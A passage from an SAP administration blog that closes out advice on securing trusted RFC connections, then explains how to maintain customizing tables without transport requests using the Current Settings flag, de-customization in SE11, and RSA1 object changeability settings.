At least yearly scan systems for wrongly setup RFC’s and delete them.
Instruct basis team never to put in their own account into an RFC connection.

The most though misunderstanding is with some security and control teams themselves. They heavily underestimate the danger of the trusted connections. They come with statements like “we focus on production only”, or “that system is not part of our compliance XYZ framework check”.

Basic golden principle:
The trusted system must have same protection level and control measures as the system it is connected to.

More RFC hacking: RFC callback hack

Next to the RFC attack methods above there is also the RFC callback hack, which uses the back direction to execute malicious actions. Read more in this blog.

Direct table maintenance versus transport

Some standard SAP tables are delivered by SAP as customizing tables with transports, but which are logically and business wise application tables and are maintained directly in production by business people. Example is the currency exchange rate table.

This blog will explain the option and best practices to overcome this.

Questions that will be answered:

What are current settings and how does it work?
When and how to de-customize a standard SAP table?

Current settings

Current settings is bit of hidden feature in SAP systems. Per customizing object you can select if it is using the current settings option or not.

To do this, start transaction SOBJ and select the customizing object or table. The current setting flag is indicated on the example picture below for the currency conversion rate table:

The effect of the Current Settings is as follows: if the system client in SCC4 is set to “Productive” the transport flags are ignored, and the user can directly update the table and save the changes without transport request popup.

On a development or quality system the “Productive” setting is not there and the SAP system will prompt you for transport request. Especially on quality systems this can be quite annoying.

The current settings is therefore only a solution for tables that you and the business want to maintain directly on production, and not on a development and quality system. Background note on this side effect is 356483 – In test system, behavior of customizing objects which are editable in production i.e. Current Settings.

De-customizing a customizing table

If you want a customizing table to be maintainable directly on development and quality systems, without transport request, you have to de-customize the customizing table.

Always ask for approval for procedure below and document the tables for which this procedure was applied. Pending on your business security and regulatory requirements more approvals and documentation can be needed.

The de-customization procedure

Step 1 starts with transaction SE11 to call up the table. This you have to doc in the development system. In the delivery and maintenance tab the delivery calls normally shows as type C (customizing).

Now edit and change it to type A (application):

In most cases this will do the trick. The change itself you have to put in a transport request.

Step 2 would be to re-generate the maintenance view and de-activate the recording routine. This should look as shown on picture below:

Direct table updates check recording routine

Also this change must be executed on development system and must be put in transport request.

Step 3 is to move the transport request into the quality and later productive system.

Special cases

Below is a list of special cases and exceptions.

CO allocation cycles (KSU1 etc)

Via the procedure described in OSS Note 853601 – “ALLOCATION: Deactivating the automatic transport” you can leave all the allocation tables as-is and don’t need to apply the de-customization procedure or current settings.

RSA1 settings to avoid transport popup for BI objects

Some settings in RSA1 like process chain starters you want to set locally per system. Default SAP asks you for a transport. In RSA1 you can overrule this. Select Transport Connection on the left hand side. Then select the button Object Changeability on top. In the popup right click on the Not Changeable and set it to Everything Changeable for the items that you don’t want a transport popup to come.

Save your data.

SAP reference: click here.